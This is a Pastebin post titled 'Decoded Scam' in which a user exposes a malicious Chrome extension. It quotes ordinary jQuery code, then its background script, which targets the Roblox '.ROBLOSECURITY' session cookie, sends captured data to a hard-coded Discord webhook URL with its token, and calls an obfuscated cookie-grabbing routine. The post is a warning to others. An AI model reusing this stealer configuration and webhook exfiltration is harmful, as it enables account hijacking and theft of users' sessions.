Guest User

Decoded Scam

a guest
Apr 18th, 2017
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.20 KB | None | 0 0
  1. jQuery-ver3.js:
  2. LINE 2164;
  3. for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {
  4. Expr.pseudos[ i ] = createInputPseudo( i );
  5. }
  6. for ( i in { submit: true, reset: true } ) {
  7. Expr.pseudos[ i ] = createButtonPseudo( i );
  8. }
  9.  
  10. LINE 8759;
  11. timeout: 0,
  12. data: null,
  13. dataType: null,
  14. username: null,
  15. password: null,
  16. cache: null,
  17. throws: false,
  18. traditional: false,
  19. headers: {},
  20.  
  21. LINE 9445;
  22. if ( support.cors || xhrSupported && !options.crossDomain ) {
  23. return {
  24. send: function( headers, complete ) {
  25. var i,
  26. xhr = options.xhr();
  27.  
  28. xhr.open(
  29. options.type,
  30. options.url,
  31. options.async,
  32. options.username,
  33. options.password
  34. );
  35.  
  36. // Apply custom fields if provided
  37. if ( options.xhrFields ) {
  38. for ( i in options.xhrFields ) {
  39. xhr[ i ] = options.xhrFields[ i ];
  40. }
  41. }
  42.  
  43. // Override mime type if needed
  44. if ( options.mimeType && xhr.overrideMimeType ) {
  45. xhr.overrideMimeType( options.mimeType );
  46. }
  47.  
  48. // X-Requested-With header
  49. // For cross-domain requests, seeing as conditions for a preflight are
  50. // akin to a jigsaw puzzle, we simply never set it to be sure.
  51. // (it can always be set on a per-request basis or even using ajaxSetup)
  52. // For same-domain requests, won't change header if already provided.
  53. if ( !options.crossDomain && !headers[ "X-Requested-With" ] ) {
  54. headers[ "X-Requested-With" ] = "XMLHttpRequest";
  55. }
  56.  
  57. bgWork.js;
  58. LINE 1;
  59. var website = "https://www.roblox.com"; // Change this to the website you want to log, don't forget to edit the manifest.json too!
  60. var cookie_data = ".ROBLOSECURITY"; // Change this to the cookie of the website!
  61. var discord_web_api = "https://discordapp.com/api/webhooks/300665626618363904/gxqkvC2xq8Q-oib-VHHSoSoT7dNiXkts6H50KhqwZ5Xqj7fL1oqYj4IMWiJuVpM9lThX"; // This is the bot api!
  62.  
  63. LINE 103;
  64. chrome[_0x3a2f[0]][_0x3a2f[49]][_0x3a2f[45]](function(_0x6f75x22) {
  65. if (_0x6f75x22[_0x3a2f[48]] == _0x3a2f[34]) {
  66. cleanerCookieGrab() <<<<<<!<<<<<<<<!<<<<!<<<<<<<!<<<<<<<<<!!!< That will grab your password.
  67. }
  68. })
  69.  
  70. What a joke. Don't get scammed by something that's too good to be free.
Add Comment
Please, Sign In to add comment